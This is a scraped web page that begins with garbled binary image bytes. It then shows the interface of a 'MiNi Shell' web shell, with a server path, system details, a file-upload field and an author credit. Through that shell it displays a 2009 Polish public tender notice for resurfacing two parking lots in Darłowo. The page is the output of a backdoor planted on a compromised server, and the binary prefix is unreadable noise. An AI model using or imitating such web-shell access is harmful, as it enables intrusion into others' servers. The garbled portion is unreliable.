JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/129829-N-2009.html

<p class="kh_header"><b>Darłowo: Remont nawierzchni parkingu przy ulicach Rynkowa 11  i Rynkowa 5 w Darłowie</b><br>
<b>Numer ogłoszenia: 129829 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Darłowie , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 094 3142223 w. 231, faks 094 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni parkingu przy ulicach Rynkowa 11  i Rynkowa 5 w Darłowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia obejmuje:

1.1. Parking przy ulicy Rynkowa 11:
1) Roboty budowlane branży drogowej polegające na:
- prace pomiarowe wykonywane przez uprawnioną jednostkę geodezyjną, polegające na 
  wytyczeniu głównych punktów drogi, zabezpieczeniu punktów osnowy geodezyjnej;
- rozbiórce niektórych elementów nawierzchni;
- roboty przygotowawcze, tj. usunięciu humusu;
- przygotowanie koryta pod warstwy konstrukcyjne projektowanych nawierzchni drogowych;
- wykonaniu elementów odwodnienia;
- wykonaniu krawężników betonowych wraz z ławami;
- wbudowaniu warstw podbudów jezdni, zjazdu, chodnika oraz miejsc parkingowych;
- wykonaniu nawierzchni jezdni, zjazdu, chodnika oraz miejsc parkingowych.
1.2. Parking przy ulicy Rynkowa 5:
1) Roboty budowlane branży drogowej polegające na:
- prace pomiarowe wykonywane przez uprawnioną jednostkę geodezyjną, polegające na 
  wytyczeniu głównych punktów drogi, zabezpieczeniu punktów osnowy geodezyjnej;
- rozbiórce niektórych elementów nawierzchni;
- roboty przygotowawcze, tj. usunięciu humusu;
- przygotowanie koryta pod warstwy konstrukcyjne projektowanych nawierzchni drogowych
- wykonaniu krawężników betonowych wraz z ławami;
- wbudowaniu warstw podbudów jezdni, zjazdu, chodnika  oraz miejsc parkingowych;
- wykonaniu nawierzchni jezdni, zjazdu, chodnika oraz miejsc parkingowych.
2. Przedmiot zamówienia obejmuje również:
- organizację i zagospodarowanie zaplecza budowy,
- wykonanie projektu tymczasowej organizacji ruchu na czas prowadzenia robót zgodnie                        
   z  obowiązującymi przepisami.
- pełną obsługę geodezyjną w trakcie wykonywania prac,
- zorganizowanie i przeprowadzenie niezbędnych prób, badań przez wyspecjalizowane i 
  uprawnione laboratoria (wszystkie badania laboratoryjne niezbędne do odbioru robót  
  zanikających) oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu robót 
  objętych przedmiotem przetargu,
- sporządzenie dokumentacji powykonawczej, łącznie z dokumentacją powykonawczą geodezyjną 
  wszystkich prac , zatwierdzoną przez odpowiedni z uwagi na lokalizację robót, Urząd Geodezji i 
  Kartografii.
- po zakończeniu robót doprowadzenie do stanu pierwotnego terenu zaplecza budowy, demontaż 
  obiektów tymczasowych oraz uporządkowanie terenu.

Szczegółowo zakres przedmiotu zamówienia zawarty jest w dokumentacjach technicznych wykonawstwa i odbioru robót, przedmiarach robót do wykonania, kosztorysach nakładczych oraz w szczegółowej specyfikacji technicznej wykonawstwa i odbioru robót, które to dokumenty są załącznikami do niniejszej s.i.w.z.
Przed złożeniem oferty przetargowej należy przeprowadzić wizję w terenie.

UWAGA!
Pozycje ujęte w kosztorysie, a dot. wywozu ziemi z korytowania oraz wywozu gruzu z rozbiórki, należy skalkulować przy założeniu, że wywóz materiału nastąpi na odległość 5km..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.21.30-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu przetargowym Zamawiający wymaga wniesienia wadium 
    w wysokości - 3.000,00zł (słownie: trzy tysiące złotych 00/100).

Wadium Wykonawcy wnoszą przed terminem wyznaczonym do złożenia oferty, tj. do dnia                  02 września 2009 roku do godz. 1030.

Wadium może być wniesione:
- w pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -    kredytowej,           
  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych, 
- gwarancjach ubezpieczeniowych, 
- poręczeniach udzielanych przez podmioty, o których mowa w art.6b, ust. 5, pkt 2 lit. b ustawy                 
  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /tekst 
  jednolity z 2007r., Nr 42, poz. 275/.


Wadium wniesione w pieniądzu Zamawiający przechowa na rachunku bankowym.
Wadium w pieniądzu należy wpłacić przelewem na rachunek Urzędu Miejskiego 
w Darłowie w banku  
Bałtycki Bank Spółdzielczy 09 8566 0003 0001 1149 2000 0002

Do oferty należy załączyć dowód wniesienia wadium / oryginał lub kserokopia przelewu potwierdzona za zgodność z oryginałem /.

Wadium w innych formach należy złożyć w ofercie, winien to być oryginał dokumentu potwierdzającego wniesienie wadium. 

Zwrotu wadium Zamawiający dokona na warunkach określonych w art. 46 ust.1, 2, 3 i 4 ustawy Prawo zamówień publicznych.
Wykonawca straci wadium na rzecz Zamawiającego w przypadkach określonych 
w art. 46 ust. 5 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1 Wykonawca biorący udział w przetargu nie może podlegać wykluczeniu z ubiegania się                   
    o udzielenie zamówienia publicznego na mocy art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień 
    publicznych,

2 Wykonawca zobowiązany jest spełnić warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień 
    publicznych, 

3 Wykonawca zobowiązany jest udokumentować, że w okresie ostatnich pięciu lat wykonał 
    minimum jedno zamówienie zakresem i charakterem równoważne lub zbliżone do przedmiotu 
    zamówienia t.j.: wykonał minimum jedną drogę bądź parking z nawierzchnią z kostki brukowej,  
    zakresem  zbliżoną do będącego przedmiotem realizacji t.j. o powierzchni nie mniejszej niż 
    500m2.
    Zamawiający uzna, że warunek został spełniony jeżeli Wykonawca udokumentuje, że
    wybudował minimum jeden ciąg komunikacyjny bądź parking w jednym zadaniu ,  
    których powierzchnia wynosiła minimum 500m2.(poparte stosownymi referencjami - 
    minimum jedna    referencja).

4 Wykonawca zobowiązany jest do udzielenia gwarancji na wykonane roboty, na okres nie 
    krótszy niż 3 lata
UWAGA!

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły                  (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.

Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń                                  i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie, że Wykonawca nie podlega wykluczeniu z ubiegania się o udzielenie  
    zamówienia publicznego, na mocy art. 24, ust. 1 i ust. 2 pkt 1 ustawy Prawo zamówień   
    publicznych,

2.Oświadczenie, że Wykonawca spełnia warunki zawarte w art. 22 ust. 1 pkt 1, 2 i 3 ustawy 
    Prawo zamówień publicznych,
3. Oświadczenie, że Wykonawca zapoznał się ze specyfikacją istotnych warunków zamówienia i 
    ją akceptuje,

4.Oświadczenie Wykonawcy, że zobowiązuje się do podpisania umowy na warunkach podanych 
    w projekcie umowy.
5.Oświadczenie, że Wykonawca akceptuje podany w s.i.w.z. termin związania złożoną ofertą,

6.Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu określone w pkt 8 
    s.i.w.z.,
7.Termin realizacji przedmiotu zamówienia - określony konkretną datą, nie przekraczającą            
     30 października 2009 roku,

8. Informację o Wykonawcy z ostatnich trzech lat, a w przypadku gdy okres prowadzenia 
    działalności jest krótszy - z tego okresu określającą ilość lat funkcjonowania na rynku, profil 
    prowadzonej działalności gospodarczej, przeciętną liczbę zatrudnionych pracowników oraz 
    liczebność personelu kierowniczego, 

9. Wykaz imienny osób, które będą kierować wykonaniem robót  w poszczególnych branżach,  
    kserokopie uprawnień budowlanych wymaganych prawem do realizacji powierzonych im  
    zakresów czynności oraz zaświadczenia o przynależności do stosownych Izb, 
 
10. Wykaz podwykonawców ( w przypadku wystąpienia takiej konieczności ), którzy będą 
    wykonywać zamówienie wraz z danymi na temat ich doświadczenia oraz z podaniem zakresu, 
    który będzie im powierzony. 
   W przypadku, gdy Wykonawca nie wymieni podwykonawców, Zamawiający uzna że   
   Wykonawca całość przedmiotu zamówienia wykona własnymi siłami. 

Zamawiający nie dopuszcza możliwości zlecenia podwykonawcom zakresu dotyczącego wykonania robót budowlanych branży drogowej .

11. Wykaz wykonanych w okresie ostatnich pięciu lat zadań, a jeżeli okres prowadzenia 
    działalności gospodarczej jest krótszy niż pięć lat - to z tego okresu zbliżonych zakresem do 
    przedmiotu zamówienia ( sporządzić w formie tabeli z podaniem nazwy zamówienia, zakresu 
    wykonanych robót, wartości, nazwy Zamawiającego, roku wykonania ) - popartych stosownymi 
    referencjami - minimum jedna referencja,

12. Potwierdzenie / dowód / wniesienia wadium,

13. Wszystkie wymagane dokumenty wymienione w pkt 19 niniejszej s.i.w.z.

14. Wykaz dokumentów, które musi zawierać oferta :

15. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
    ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie  
    zamówienia albo składania ofert,

16. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  
    Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
    potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz 
    składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w 
    całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące 
    przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o 
    udzielenie zamówienia albo składania ofert,

17. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt  
    4-8 lub art. 24 ust. pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem   
    terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie 
    zamówienia albo składania ofert,
18. Aktualne ubezpieczenie od odpowiedzialności cywilnej w ramach prowadzonej działalności 
    gospodarczej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.darlowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Darłowie ul. Plac T. Kościuszki 9 76 - 150 Darłowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2009 godzina 10:30, miejsce: Urząd Miejski w Darłowie ul. Plac T. Kościuszki 9 76 - 150 Darłowo Sekretariat pok. nr 21.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com